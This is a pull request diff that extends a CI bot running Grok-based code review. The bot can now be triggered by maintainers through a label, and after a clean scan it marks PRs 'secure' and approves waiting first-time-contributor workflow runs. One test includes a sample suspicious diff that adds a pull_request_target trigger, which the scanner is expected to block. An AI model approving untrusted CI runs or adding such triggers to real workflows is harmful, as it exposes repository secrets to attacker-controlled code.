### PR TITLE
feat(ci): start AI review from label and approve waiting checks

### DIFF
--- a/.github/workflows/ai-review.yml
+++ b/.github/workflows/ai-review.yml
@@ -34,7 +34,10 @@ jobs:
         && github.event.pull_request.user.login != 'jherr')
       || (github.event_name == 'pull_request'
         && github.event.action == 'labeled'
-        && github.event.label.name == 'ai-review')
+        && github.event.label.name == 'ai-review'
+        && (github.event.sender.login == 'AlemTuzlak'
+          || github.event.sender.login == 'tombeckenham'
+          || github.event.sender.login == 'jherr'))
       || github.event_name == 'workflow_dispatch'
       || (github.event_name == 'issue_comment'
         && github.event.issue.pull_request

--- a/.github/workflows/ai-review.yml
+++ b/.github/workflows/ai-review.yml
@@ -6,7 +6,7 @@ name: AI review
 
 on:
   pull_request:
-    types: [opened, synchronize, ready_for_review]
+    types: [opened, synchronize, ready_for_review, labeled]
   workflow_dispatch:
     inputs:
       pr_number:
@@ -27,10 +27,14 @@ jobs:
     name: Review
     if: >
       (github.event_name == 'pull_request'
+        && github.event.action != 'labeled'
         && github.event.pull_request.draft == false
         && github.event.pull_request.user.login != 'AlemTuzlak'
         && github.event.pull_request.user.login != 'tombeckenham'
         && github.event.pull_request.user.login != 'jherr')
+      || (github.event_name == 'pull_request'
+        && github.event.action == 'labeled'
+        && github.event.label.name == 'ai-review')
       || github.event_name == 'workflow_dispatch'
       || (github.event_name == 'issue_comment'
         && github.event.issue.pull_request

--- a/agent-scripts/ai-review/README.md
+++ b/agent-scripts/ai-review/README.md
@@ -51,7 +51,7 @@ A full agent run needs `AI_REVIEW_TOKEN`, `XAI_API_KEY`, `GITHUB_EVENT_NAME`, `G
 
 ## Failed run
 
-Open the **AI review** workflow log. The job prints Grok debug output and the verdict there.
+Open the **AI review** workflow log. The job prints each stream chunk and the verdict there.
 
 Common causes:
 

--- a/agent-scripts/ai-review/README.md
+++ b/agent-scripts/ai-review/README.md
@@ -20,12 +20,13 @@ Until both secrets exist, the job fails with `missing AI_REVIEW_TOKEN or XAI_API
 - Keep those logins in sync with `.github/maintainers.json`. GitHub then shows a skipped check, not a cancelled check.
 - Manual: Actions `workflow_dispatch` with a PR number.
 - Manual: a login in `.github/maintainers.json` comments `/ai-review` on the PR.
+- Manual: add the `ai-review` label to the PR. Remove it and add it again to run a second time.
 
 Auto also skips drafts, bot PRs, roster-maintainer PRs, the machine user's own head commit, and a head SHA this bot already reviewed. Manual still runs on those. The bot never executes PR code.
 
 ## Labels
 
-The bot sets exactly one of these. It removes the other two. It never touches `ready-to-merge`.
+Add the `ai-review` label to start a manual run. The bot does not remove that label. The bot sets exactly one of these verdict labels. It removes the other two. It never touches `ready-to-merge`.
 
 | Label           | Meaning                                                                |
 | --------------- | ---------------------------------------------------------------------- |

--- a/agent-scripts/ai-review/README.md
+++ b/agent-scripts/ai-review/README.md
@@ -51,7 +51,7 @@ A full agent run needs `AI_REVIEW_TOKEN`, `XAI_API_KEY`, `GITHUB_EVENT_NAME`, `G
 
 ## Failed run
 
-Open the **AI review** workflow log. The job prints each stream chunk and the verdict there.
+Open the **AI review** workflow log. The job prints text, reasoning, tool input/output, and the verdict. It does not print raw chunks.
 
 Common causes:
 

--- a/agent-scripts/ai-review/README.md
+++ b/agent-scripts/ai-review/README.md
@@ -20,7 +20,7 @@ Until both secrets exist, the job fails with `missing AI_REVIEW_TOKEN or XAI_API
 - Keep those logins in sync with `.github/maintainers.json`. GitHub then shows a skipped check, not a cancelled check.
 - Manual: Actions `workflow_dispatch` with a PR number.
 - Manual: a login in `.github/maintainers.json` comments `/ai-review` on the PR.
-- Manual: add the `ai-review` label to the PR. Remove it and add it again to run a second time.
+- Manual: a login in `.github/maintainers.json` adds the `ai-review` label. Remove it and add it again to run a second time.
 
 Auto also skips drafts, bot PRs, roster-maintainer PRs, the machine user's own head commit, and a head SHA this bot already reviewed. Manual still runs on those. The bot never executes PR code.
 
@@ -28,7 +28,7 @@ A first-time fork PR does not run auto review until a maintainer comments `/ai-r
 
 ## Labels
 
-Add the `ai-review` label to start a manual run. The bot does not remove that label.
+A roster maintainer adds the `ai-review` label to start a manual run. The bot does not remove that label. The bot does not auto-approve workflows when the PR changes a workflow file.
 
 The bot sets exactly one of these verdict labels. It removes the other two. It never touches `ready-to-merge`.
 

--- a/agent-scripts/ai-review/README.md
+++ b/agent-scripts/ai-review/README.md
@@ -51,7 +51,9 @@ A full agent run needs `AI_REVIEW_TOKEN`, `XAI_API_KEY`, `GITHUB_EVENT_NAME`, `G
 
 ## Failed run
 
-Open the **AI review** workflow log. Common causes:
+Open the **AI review** workflow log. The job prints Grok debug output and the verdict there.
+
+Common causes:
 
 - Missing `AI_REVIEW_TOKEN` or `XAI_API_KEY`
 - Fork with maintainer edits off (comment is posted, label is `ai-needs-work`, no push)

--- a/agent-scripts/ai-review/README.md
+++ b/agent-scripts/ai-review/README.md
@@ -2,12 +2,12 @@
 
 A GitHub Action that reviews open pull requests with TanStack AI (`chat()` + `grokBuildText('grok-4.6')`). It comments, sets one `ai-*` label, and can push listed polish commits.
 
-The first lines of every bot comment say the comment is automated. It is not a maintainer review. The bot never GitHub-approves and never merges.
+The first lines of every bot comment say the comment is automated. It is not a maintainer review. The bot never GitHub-approves a review and never merges.
 
 ## What you need
 
 1. A machine GitHub user with write access on this repo.
-2. A PAT for that user, stored as repo secret `AI_REVIEW_TOKEN`.
+2. A PAT for that user, stored as repo secret `AI_REVIEW_TOKEN`. The PAT needs `repo` so it can approve waiting Actions runs.
 3. An xAI key, stored as repo secret `XAI_API_KEY`.
 4. Set `AI_REVIEW_MACHINE_USER` in the workflow to that user's login (default `tanstack-ai-bot`).
 
@@ -24,15 +24,22 @@ Until both secrets exist, the job fails with `missing AI_REVIEW_TOKEN or XAI_API
 
 Auto also skips drafts, bot PRs, roster-maintainer PRs, the machine user's own head commit, and a head SHA this bot already reviewed. Manual still runs on those. The bot never executes PR code.
 
+A first-time fork PR does not run auto review until a maintainer comments `/ai-review` or adds the `ai-review` label. After a clean `ai-ready` scan, the bot approves the waiting Test checks.
+
 ## Labels
 
-Add the `ai-review` label to start a manual run. The bot does not remove that label. The bot sets exactly one of these verdict labels. It removes the other two. It never touches `ready-to-merge`.
+Add the `ai-review` label to start a manual run. The bot does not remove that label.
+
+The bot sets exactly one of these verdict labels. It removes the other two. It never touches `ready-to-merge`.
+
+When the verdict is `ai-ready` and a host scan finds no malware, the bot adds `secure`. Then it approves waiting first-time-contributor workflow runs. A maintainer can Approve and merge without clicking **Approve and run workflows** first.
 
 | Label           | Meaning                                                                |
 | --------------- | ---------------------------------------------------------------------- |
 | `ai-rejected`   | Not useful, or it does not fix the claimed bug.                        |
 | `ai-needs-work` | Listed fixes are not on the branch (no push, or maintainer edits off). |
 | `ai-ready`      | The bot thinks a maintainer can merge after they Approve.              |
+| `secure`        | Host scan found no malware. The bot approved waiting workflow runs.    |
 
 ## Local run
 

--- a/agent-scripts/ai-review/comments.test.ts
+++ b/agent-scripts/ai-review/comments.test.ts
@@ -92,6 +92,8 @@ function sampleInput() {
     findings: ['src/chat.ts:40 null crash on empty messages'],
     pushNote: 'Did not push: fork has maintainer edits off.',
     label: 'ai-ready' as const,
+    securityNote:
+      'clean. Added label `secure`. Approved 2 waiting workflow runs.',
   }
 }
 
@@ -105,6 +107,8 @@ describe('buildReviewComment', () => {
     expect(body).toContain('src/chat.ts:40 null crash on empty messages')
     expect(body).toContain('Did not push: fork has maintainer edits off.')
     expect(body).toContain('ai-ready')
+    expect(body).toContain('**Security**')
+    expect(body).toContain('Added label `secure`')
   })
 })
 

--- a/agent-scripts/ai-review/comments.ts
+++ b/agent-scripts/ai-review/comments.ts
@@ -41,6 +41,7 @@ export function buildReviewComment(input: {
   findings: Array<string>
   pushNote: string
   label: 'ai-rejected' | 'ai-needs-work' | 'ai-ready'
+  securityNote: string
 }) {
   const findingLines =
     input.findings.length === 0
@@ -58,6 +59,9 @@ export function buildReviewComment(input: {
     '',
     '**Push**',
     input.pushNote,
+    '',
+    '**Security**',
+    input.securityNote,
     '',
     'Maintainers still GitHub-approve.',
     COMMENT_MARKER,

--- a/agent-scripts/ai-review/event.test.ts
+++ b/agent-scripts/ai-review/event.test.ts
@@ -16,6 +16,42 @@ describe('parseReviewEvent', () => {
     })
   })
 
+  it('parses a pull_request labeled ai-review as manual', () => {
+    expect(
+      parseReviewEvent({
+        eventName: 'pull_request',
+        event: {
+          action: 'labeled',
+          label: { name: 'ai-review' },
+          pull_request: { number: 42 },
+        },
+      }),
+    ).toEqual({
+      prNumber: 42,
+      mode: 'manual',
+      commentAuthor: null,
+      eventName: 'pull_request',
+    })
+  })
+
+  it('parses a pull_request labeled with another name as auto', () => {
+    expect(
+      parseReviewEvent({
+        eventName: 'pull_request',
+        event: {
+          action: 'labeled',
+          label: { name: 'bug' },
+          pull_request: { number: 42 },
+        },
+      }),
+    ).toEqual({
+      prNumber: 42,
+      mode: 'auto',
+      commentAuthor: null,
+      eventName: 'pull_request',
+    })
+  })
+
   it('parses workflow_dispatch string pr_number as manual', () => {
     expect(
       parseReviewEvent({

--- a/agent-scripts/ai-review/event.test.ts
+++ b/agent-scripts/ai-review/event.test.ts
@@ -23,13 +23,14 @@ describe('parseReviewEvent', () => {
         event: {
           action: 'labeled',
           label: { name: 'ai-review' },
+          sender: { login: 'alem' },
           pull_request: { number: 42 },
         },
       }),
     ).toEqual({
       prNumber: 42,
       mode: 'manual',
-      commentAuthor: null,
+      commentAuthor: 'alem',
       eventName: 'pull_request',
     })
   })

--- a/agent-scripts/ai-review/event.ts
+++ b/agent-scripts/ai-review/event.ts
@@ -1,3 +1,5 @@
+export const AI_REVIEW_TRIGGER_LABEL = 'ai-review'
+
 export type ReviewEvent = {
   prNumber: number
   mode: 'auto' | 'manual'
@@ -32,9 +34,34 @@ function readCommentAuthor(event: unknown) {
   return user.login
 }
 
+function readAction(event: unknown) {
+  return isRecord(event) && typeof event.action === 'string'
+    ? event.action
+    : null
+}
+
+function readEventLabelName(event: unknown) {
+  const label = isRecord(event) ? event.label : undefined
+  return isRecord(label) && typeof label.name === 'string' ? label.name : null
+}
+
+/** True when this `pull_request` event is someone adding the `ai-review` label. */
+export function isAiReviewLabelEvent(event: unknown) {
+  return (
+    readAction(event) === 'labeled' &&
+    readEventLabelName(event) === AI_REVIEW_TRIGGER_LABEL
+  )
+}
+
+/** True when this `pull_request` event is any label add. */
+export function isPullRequestLabeledEvent(event: unknown) {
+  return readAction(event) === 'labeled'
+}
+
 /**
  * Parse a GitHub Actions event into the PR number and auto vs manual mode.
  *
+ * A `pull_request` `labeled` event with the `ai-review` label is manual.
  * Throws if `eventName` is unknown, `workflow_dispatch` has no valid
  * `inputs.pr_number`, or `issue_comment` is not on a pull request.
  */
@@ -52,7 +79,7 @@ export function parseReviewEvent(input: { eventName: string; event: unknown }) {
       }
       return {
         prNumber,
-        mode: 'auto',
+        mode: isAiReviewLabelEvent(input.event) ? 'manual' : 'auto',
         commentAuthor: null,
         eventName: 'pull_request',
       } satisfies ReviewEvent

--- a/agent-scripts/ai-review/event.ts
+++ b/agent-scripts/ai-review/event.ts
@@ -34,6 +34,14 @@ function readCommentAuthor(event: unknown) {
   return user.login
 }
 
+function readSenderLogin(event: unknown) {
+  const sender = isRecord(event) ? event.sender : undefined
+  if (!isRecord(sender) || typeof sender.login !== 'string') {
+    return null
+  }
+  return sender.login
+}
+
 function readAction(event: unknown) {
   return isRecord(event) && typeof event.action === 'string'
     ? event.action
@@ -80,7 +88,9 @@ export function parseReviewEvent(input: { eventName: string; event: unknown }) {
       return {
         prNumber,
         mode: isAiReviewLabelEvent(input.event) ? 'manual' : 'auto',
-        commentAuthor: null,
+        commentAuthor: isAiReviewLabelEvent(input.event)
+          ? readSenderLogin(input.event)
+          : null,
         eventName: 'pull_request',
       } satisfies ReviewEvent
     }

--- a/agent-scripts/ai-review/log.test.ts
+++ b/agent-scripts/ai-review/log.test.ts
@@ -1,0 +1,67 @@
+import { describe, expect, it } from 'vitest'
+import { createReviewStreamLogger } from './log.ts'
+
+function collect() {
+  const lines: Array<string> = []
+  const logger = createReviewStreamLogger((line) => {
+    lines.push(line)
+  })
+  return { logger, lines }
+}
+
+describe('createReviewStreamLogger', () => {
+  it('logs finished text and reasoning, not start/end noise', () => {
+    const { logger, lines } = collect()
+    logger.chunk({ type: 'RUN_STARTED' })
+    logger.chunk({ type: 'TEXT_MESSAGE_START', messageId: 'm1' })
+    logger.chunk({ type: 'TEXT_MESSAGE_CONTENT', delta: 'Hello ' })
+    logger.chunk({ type: 'TEXT_MESSAGE_CONTENT', delta: 'world' })
+    logger.chunk({ type: 'TEXT_MESSAGE_END', messageId: 'm1' })
+    logger.chunk({
+      type: 'REASONING_MESSAGE_CONTENT',
+      delta: 'need to read files',
+    })
+    logger.chunk({ type: 'REASONING_MESSAGE_END' })
+    logger.chunk({ type: 'RUN_FINISHED' })
+    expect(lines).toEqual([
+      'text:\nHello world',
+      'reasoning:\nneed to read files',
+    ])
+  })
+
+  it('logs tool name, input, and output', () => {
+    const { logger, lines } = collect()
+    logger.chunk({
+      type: 'TOOL_CALL_START',
+      toolCallId: 't1',
+      toolCallName: 'read_file',
+    })
+    logger.chunk({
+      type: 'TOOL_CALL_ARGS',
+      toolCallId: 't1',
+      delta: '{"path":"src/a.ts"}',
+    })
+    logger.chunk({
+      type: 'TOOL_CALL_END',
+      toolCallId: 't1',
+      input: { path: 'src/a.ts' },
+    })
+    logger.chunk({
+      type: 'TOOL_CALL_RESULT',
+      toolCallId: 't1',
+      content: '{"content":"export const x = 1"}',
+    })
+    expect(lines).toEqual([
+      'tool read_file input:\n{\n  "path": "src/a.ts"\n}',
+      'tool read_file output:\n{\n  "content": "export const x = 1"\n}',
+    ])
+  })
+
+  it('skips empty text and unknown lifecycle events', () => {
+    const { logger, lines } = collect()
+    logger.chunk({ type: 'TEXT_MESSAGE_END' })
+    logger.chunk({ type: 'STEP_STARTED', stepName: 'think' })
+    logger.flush()
+    expect(lines).toEqual([])
+  })
+})

--- a/agent-scripts/ai-review/log.ts
+++ b/agent-scripts/ai-review/log.ts
@@ -1,0 +1,135 @@
+/**
+ * Print useful review-stream content to CI logs. Skip lifecycle noise.
+ */
+
+const MAX_CHARS = 4000
+
+function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === 'object' && value !== null && !Array.isArray(value)
+}
+
+function clip(text: string) {
+  if (text.length <= MAX_CHARS) return text
+  return `${text.slice(0, MAX_CHARS)}\n… (${String(text.length - MAX_CHARS)} more chars)`
+}
+
+function pretty(value: unknown) {
+  if (typeof value === 'string') {
+    const trimmed = value.trim()
+    if (trimmed.startsWith('{') || trimmed.startsWith('[')) {
+      try {
+        return JSON.stringify(JSON.parse(trimmed), null, 2)
+      } catch {
+        return value
+      }
+    }
+    return value
+  }
+  try {
+    return JSON.stringify(value, null, 2)
+  } catch {
+    return String(value)
+  }
+}
+
+function readString(value: unknown, key: string) {
+  if (!isRecord(value) || typeof value[key] !== 'string') return null
+  return value[key]
+}
+
+/**
+ * Buffer text/reasoning/tool args, then write one block per finished item.
+ */
+export function createReviewStreamLogger(
+  write: (line: string) => void = console.log,
+) {
+  let text = ''
+  let reasoning = ''
+  const toolName = new Map<string, string>()
+  const toolArgs = new Map<string, string>()
+
+  function flush(label: string, buffer: string) {
+    const body = buffer.trim()
+    if (body.length === 0) return
+    write(`${label}:\n${clip(body)}`)
+  }
+
+  return {
+    chunk(value: unknown) {
+      if (!isRecord(value) || typeof value.type !== 'string') return
+      const type = value.type
+      if (type === 'TEXT_MESSAGE_CONTENT' || type === 'TEXT_MESSAGE_CHUNK') {
+        const delta = readString(value, 'delta')
+        if (delta !== null) text += delta
+        return
+      }
+      if (type === 'TEXT_MESSAGE_END') {
+        flush('text', text)
+        text = ''
+        return
+      }
+      if (
+        type === 'REASONING_MESSAGE_CONTENT' ||
+        type === 'REASONING_MESSAGE_CHUNK' ||
+        type === 'THINKING_TEXT_MESSAGE_CONTENT'
+      ) {
+        const delta = readString(value, 'delta')
+        if (delta !== null) reasoning += delta
+        return
+      }
+      if (
+        type === 'REASONING_MESSAGE_END' ||
+        type === 'THINKING_TEXT_MESSAGE_END'
+      ) {
+        flush('reasoning', reasoning)
+        reasoning = ''
+        return
+      }
+      if (type === 'TOOL_CALL_START') {
+        const id = readString(value, 'toolCallId')
+        const name =
+          readString(value, 'toolCallName') ??
+          readString(value, 'toolName') ??
+          'tool'
+        if (id !== null) toolName.set(id, name)
+        return
+      }
+      if (type === 'TOOL_CALL_ARGS' || type === 'TOOL_CALL_CHUNK') {
+        const id = readString(value, 'toolCallId')
+        const delta = readString(value, 'delta')
+        if (id !== null && delta !== null) {
+          toolArgs.set(id, (toolArgs.get(id) ?? '') + delta)
+        }
+        return
+      }
+      if (type === 'TOOL_CALL_END') {
+        const id = readString(value, 'toolCallId')
+        if (id === null) return
+        const name = toolName.get(id) ?? 'tool'
+        const input =
+          'input' in value && value.input !== undefined
+            ? pretty(value.input)
+            : pretty(toolArgs.get(id) ?? '')
+        write(`tool ${name} input:\n${clip(input)}`)
+        return
+      }
+      if (type === 'TOOL_CALL_RESULT') {
+        const id = readString(value, 'toolCallId')
+        const name = (id !== null ? toolName.get(id) : undefined) ?? 'tool'
+        const content = 'content' in value ? pretty(value.content) : ''
+        write(`tool ${name} output:\n${clip(content)}`)
+        return
+      }
+      if (type === 'RUN_ERROR') {
+        const message = readString(value, 'message') ?? pretty(value)
+        write(`error: ${message}`)
+      }
+    },
+    flush() {
+      flush('text', text)
+      text = ''
+      flush('reasoning', reasoning)
+      reasoning = ''
+    },
+  }
+}

--- a/agent-scripts/ai-review/run.test.ts
+++ b/agent-scripts/ai-review/run.test.ts
@@ -304,6 +304,40 @@ describe('runReviewJob', () => {
     expect(gitCalls).toEqual([])
   })
 
+  it('runs when the ai-review label is added to a maintainer PR', async () => {
+    const { result, comments } = await runJob({
+      pull: samplePull({ login: 'alem' }),
+      event: {
+        action: 'labeled',
+        label: { name: 'ai-review' },
+        pull_request: { number: NUMBER },
+      },
+      review: readyReview,
+    })
+
+    expect(result).toEqual({
+      skipped: false,
+      verdict: { verdict: 'ready', issues: [] },
+      label: 'ai-ready',
+      pushLanded: false,
+    })
+    expect(comments).toHaveLength(1)
+  })
+
+  it('skips a labeled pull_request that is not the ai-review label', async () => {
+    const { result, comments, gitCalls } = await runJob({
+      event: {
+        action: 'labeled',
+        label: { name: 'bug' },
+        pull_request: { number: NUMBER },
+      },
+    })
+
+    expect(result).toEqual({ skipped: true, reason: 'not-label' })
+    expect(comments).toEqual([])
+    expect(gitCalls).toEqual([])
+  })
+
   it('skips an issue_comment that is not the /ai-review command', async () => {
     const { result, comments, gitCalls } = await runJob({
       eventName: 'issue_comment',

--- a/agent-scripts/ai-review/run.test.ts
+++ b/agent-scripts/ai-review/run.test.ts
@@ -103,6 +103,7 @@ function createFakeGitHub(
   options: {
     pull?: ReturnType<typeof samplePull>
     files?: ReturnType<typeof sampleFiles>
+    waitingRunIds?: Array<number>
   } = {},
 ) {
   const pull = options.pull ?? samplePull()
@@ -111,6 +112,8 @@ function createFakeGitHub(
   let nextId = 1
   const issueLabels = new Set<string>()
   const repoLabels = new Set<string>()
+  const approvedRuns: Array<number> = []
+  const waitingRunIds = options.waitingRunIds ?? []
   const pullPath = `/repos/${REPO}/pulls/${NUMBER}`
   const filesPath = `/repos/${REPO}/pulls/${NUMBER}/files`
   const repoLabelsPath = `/repos/${REPO}/labels`
@@ -122,6 +125,26 @@ function createFakeGitHub(
     },
     async rest(method, path, body) {
       if (method === 'GET' && path === pullPath) return pull
+      if (method === 'GET' && path.startsWith(`/repos/${REPO}/actions/runs?`)) {
+        const params = new URL(`https://api.github.com${path}`).searchParams
+        const ids =
+          params.get('status') === 'waiting' && params.get('head_sha') === SHA
+            ? waitingRunIds
+            : []
+        return {
+          workflow_runs: ids.map((id) => ({
+            id,
+            head_sha: SHA,
+            status: params.get('status'),
+          })),
+        }
+      }
+      const approveMatch =
+        /^\/repos\/TanStack\/ai\/actions\/runs\/(\d+)\/approve$/.exec(path)
+      if (method === 'POST' && approveMatch?.[1] !== undefined) {
+        approvedRuns.push(Number(approveMatch[1]))
+        return null
+      }
       if (method === 'GET' && path.startsWith(`${filesPath}?`)) {
         const params = new URL(`https://api.github.com${path}`).searchParams
         const page = Number(params.get('page') ?? '1')
@@ -193,7 +216,7 @@ function createFakeGitHub(
     },
   } satisfies GitHubClient
 
-  return { client, comments, issueLabels }
+  return { client, comments, issueLabels, approvedRuns }
 }
 
 function createFakeRunner(
@@ -258,8 +281,14 @@ async function runJob(options: {
   alreadyReviewedSha?: string | null
   headCommitAuthorLogin?: string | null
   gitImpl?: (args: Array<string>, cwd: string) => GitResult
+  files?: ReturnType<typeof sampleFiles>
+  waitingRunIds?: Array<number>
 }) {
-  const github = createFakeGitHub({ pull: options.pull })
+  const github = createFakeGitHub({
+    pull: options.pull,
+    files: options.files,
+    waitingRunIds: options.waitingRunIds,
+  })
   const git = createFakeRunner(options.gitImpl)
   const result = await runReviewJob({
     client: github.client,
@@ -280,6 +309,7 @@ async function runJob(options: {
     comments: github.comments,
     issueLabels: github.issueLabels,
     gitCalls: git.calls,
+    approvedRuns: github.approvedRuns,
   }
 }
 
@@ -427,7 +457,7 @@ describe('runReviewJob', () => {
     expect(comments[0]?.body).toContain(`**Head SHA:** ${SHA}`)
     expect(comments[0]?.body).toContain('**Label:** `ai-ready`')
     expect(comments[0]?.body).toContain('Did not push.')
-    expect([...issueLabels]).toEqual(['ai-ready'])
+    expect([...issueLabels]).toEqual(['ai-ready', 'secure'])
     expect(gitCalls).toEqual([])
   })
 
@@ -454,7 +484,7 @@ describe('runReviewJob', () => {
       'Pushed polish commit to the PR branch.',
     )
     expect(comments[0]?.body).toContain('**Label:** `ai-ready`')
-    expect([...issueLabels]).toEqual(['ai-ready'])
+    expect([...issueLabels]).toEqual(['ai-ready', 'secure'])
     expect(gitCalls).toEqual([
       { args: ['add', '-A'], cwd: WORKTREE },
       {
@@ -517,6 +547,38 @@ describe('runReviewJob', () => {
     expect(comments[0]?.body).toContain('**Verdict:** reject')
     expect(comments[0]?.body).toContain('**Label:** `ai-rejected`')
     expect([...issueLabels]).toEqual(['ai-rejected'])
+    expect(comments[0]?.body).toContain('Did not mark secure.')
     expect(gitCalls).toEqual([])
+  })
+
+  it('adds secure and approves waiting workflows when ready and clean', async () => {
+    const { comments, issueLabels, approvedRuns } = await runJob({
+      review: readyReview,
+      waitingRunIds: [101, 202],
+    })
+
+    expect([...issueLabels]).toEqual(['ai-ready', 'secure'])
+    expect(approvedRuns).toEqual([101, 202])
+    expect(comments[0]?.body).toContain('Added label `secure`')
+    expect(comments[0]?.body).toContain('Approved 2 waiting workflow runs.')
+  })
+
+  it('does not mark secure or approve workflows when the diff looks like malware', async () => {
+    const { comments, issueLabels, approvedRuns } = await runJob({
+      review: readyReview,
+      waitingRunIds: [101],
+      files: [
+        {
+          filename: '.github/workflows/ci.yml',
+          patch:
+            '@@ -1,2 +1,4 @@\n on:\n+  pull_request_target:\n+    types: [opened]\n',
+        },
+      ],
+    })
+
+    expect([...issueLabels]).toEqual(['ai-ready'])
+    expect(approvedRuns).toEqual([])
+    expect(comments[0]?.body).toContain('blocked. Did not approve workflows.')
+    expect(comments[0]?.body).toContain('adds pull_request_target')
   })
 })

--- a/agent-scripts/ai-review/run.test.ts
+++ b/agent-scripts/ai-review/run.test.ts
@@ -104,6 +104,7 @@ function createFakeGitHub(
     pull?: ReturnType<typeof samplePull>
     files?: ReturnType<typeof sampleFiles>
     waitingRunIds?: Array<number>
+    approveError?: string
   } = {},
 ) {
   const pull = options.pull ?? samplePull()
@@ -142,6 +143,11 @@ function createFakeGitHub(
       const approveMatch =
         /^\/repos\/TanStack\/ai\/actions\/runs\/(\d+)\/approve$/.exec(path)
       if (method === 'POST' && approveMatch?.[1] !== undefined) {
+        if (options.approveError !== undefined) {
+          throw new Error(
+            `GitHub REST POST ${path} → HTTP 403: ${options.approveError}`,
+          )
+        }
         approvedRuns.push(Number(approveMatch[1]))
         return null
       }
@@ -283,11 +289,13 @@ async function runJob(options: {
   gitImpl?: (args: Array<string>, cwd: string) => GitResult
   files?: ReturnType<typeof sampleFiles>
   waitingRunIds?: Array<number>
+  approveError?: string
 }) {
   const github = createFakeGitHub({
     pull: options.pull,
     files: options.files,
     waitingRunIds: options.waitingRunIds,
+    approveError: options.approveError,
   })
   const git = createFakeRunner(options.gitImpl)
   const result = await runReviewJob({
@@ -340,6 +348,7 @@ describe('runReviewJob', () => {
       event: {
         action: 'labeled',
         label: { name: 'ai-review' },
+        sender: { login: 'alem' },
         pull_request: { number: NUMBER },
       },
       review: readyReview,
@@ -580,5 +589,34 @@ describe('runReviewJob', () => {
     expect(approvedRuns).toEqual([])
     expect(comments[0]?.body).toContain('blocked. Did not approve workflows.')
     expect(comments[0]?.body).toContain('adds pull_request_target')
+  })
+
+  it('skips a labeled ai-review event from a non-maintainer', async () => {
+    const { result, comments, approvedRuns } = await runJob({
+      event: {
+        action: 'labeled',
+        label: { name: 'ai-review' },
+        sender: { login: 'stranger' },
+        pull_request: { number: NUMBER },
+      },
+      waitingRunIds: [101],
+    })
+
+    expect(result).toEqual({ skipped: true, reason: 'not-maintainer' })
+    expect(comments).toEqual([])
+    expect(approvedRuns).toEqual([])
+  })
+
+  it('does not leave secure when workflow approval fails', async () => {
+    const { comments, issueLabels, approvedRuns } = await runJob({
+      review: readyReview,
+      waitingRunIds: [101],
+      approveError: 'Resource not accessible by personal access token',
+    })
+
+    expect([...issueLabels]).toEqual(['ai-ready'])
+    expect(approvedRuns).toEqual([])
+    expect(comments[0]?.body).toContain('Did not add label `secure`')
+    expect(comments[0]?.body).toContain('Could not approve workflows')
   })
 })

--- a/agent-scripts/ai-review/run.ts
+++ b/agent-scripts/ai-review/run.ts
@@ -165,6 +165,7 @@ export function createGrokReview() {
         cwd: input.worktreeRoot,
         grokExecutable: join(homedir(), '.grok', 'bin', 'grok'),
       }),
+      debug: true,
       tools: createReviewTools({ worktreeRoot: input.worktreeRoot }),
       outputSchema: reviewVerdictSchema,
       middleware: [withSandbox(sandbox)],
@@ -191,7 +192,9 @@ export function createGrokReview() {
         },
       ],
     })
-    return parseVerdict(result)
+    const verdict = parseVerdict(result)
+    console.log('ai-review verdict', JSON.stringify(verdict, null, 2))
+    return verdict
   }
 }
 
@@ -444,7 +447,7 @@ export async function main() {
     parsed.prNumber,
     machineUserLogin,
   )
-  await runReviewJob({
+  const result = await runReviewJob({
     client,
     repo,
     token,
@@ -461,6 +464,13 @@ export async function main() {
         ? null
         : headCommitAuthor,
   })
+  if (result.skipped) {
+    console.log(`ai-review skipped: ${result.reason}`)
+    return
+  }
+  console.log(
+    `ai-review done label=${result.label} push=${String(result.pushLanded)}`,
+  )
 }
 
 if (isExecutedDirectly()) {

--- a/agent-scripts/ai-review/run.ts
+++ b/agent-scripts/ai-review/run.ts
@@ -257,6 +257,12 @@ export async function runReviewJob(opts: {
     return { skipped: true as const, reason: 'not-label' }
   }
 
+  if (isAiReviewLabelEvent(opts.event)) {
+    if (!isRosterMaintainer(parsed.commentAuthor, opts.config)) {
+      return { skipped: true as const, reason: 'not-maintainer' }
+    }
+  }
+
   const pr = await fetchPullRequest(opts.client, opts.repo, parsed.prNumber)
   const skip = shouldSkip({
     mode: parsed.mode,
@@ -313,12 +319,9 @@ export async function runReviewJob(opts: {
 
   const label = reviewLabelFor(verdict.verdict, pushLanded)
   const security = scanPullSecurity(pr.files)
-  const markSecure = label === 'ai-ready' && security.ok
-  await setReviewState(opts.client, opts.repo, pr.number, label)
-  await setSecureLabel(opts.client, opts.repo, pr.number, markSecure)
   let approvedRuns = 0
   let approveError: string | null = null
-  if (markSecure) {
+  if (label === 'ai-ready' && security.ok) {
     try {
       approvedRuns = await approveWaitingWorkflows(
         opts.client,
@@ -329,6 +332,10 @@ export async function runReviewJob(opts: {
       approveError = error instanceof Error ? error.message : String(error)
     }
   }
+  const markSecure =
+    label === 'ai-ready' && security.ok && approveError === null
+  await setReviewState(opts.client, opts.repo, pr.number, label)
+  await setSecureLabel(opts.client, opts.repo, pr.number, markSecure)
   const findings = []
   for (const issue of verdict.issues) {
     findings.push(formatFinding(issue))
@@ -366,14 +373,14 @@ function securityNoteFor(input: {
   approvedRuns: number
   approveError: string | null
 }) {
-  if (!input.markSecure) {
-    if (input.reasons.length > 0) {
-      return `blocked. Did not approve workflows.\n${input.reasons.map((reason) => `- ${reason}`).join('\n')}`
-    }
-    return 'Did not mark secure. Verdict is not ai-ready.'
+  if (input.reasons.length > 0) {
+    return `blocked. Did not approve workflows.\n${input.reasons.map((reason) => `- ${reason}`).join('\n')}`
   }
   if (input.approveError !== null) {
-    return `clean. Added label \`secure\`. Could not approve workflows: ${input.approveError}`
+    return `clean. Did not add label \`secure\`. Could not approve workflows: ${input.approveError}`
+  }
+  if (!input.markSecure) {
+    return 'Did not mark secure. Verdict is not ai-ready.'
   }
   if (input.approvedRuns === 0) {
     return 'clean. Added label `secure`. No waiting workflow runs.'

--- a/agent-scripts/ai-review/run.ts
+++ b/agent-scripts/ai-review/run.ts
@@ -34,7 +34,11 @@ import {
   isBotReviewComment,
   upsertReviewComment,
 } from './comments.ts'
-import { parseReviewEvent } from './event.ts'
+import {
+  isAiReviewLabelEvent,
+  isPullRequestLabeledEvent,
+  parseReviewEvent,
+} from './event.ts'
 import { commitAll, headRemoteUrl, pushHead } from './git.ts'
 import type { GitRunner } from './git.ts'
 import { setReviewState } from './labels.ts'
@@ -220,6 +224,14 @@ export async function runReviewJob(opts: {
     if (!isRosterMaintainer(parsed.commentAuthor, opts.config)) {
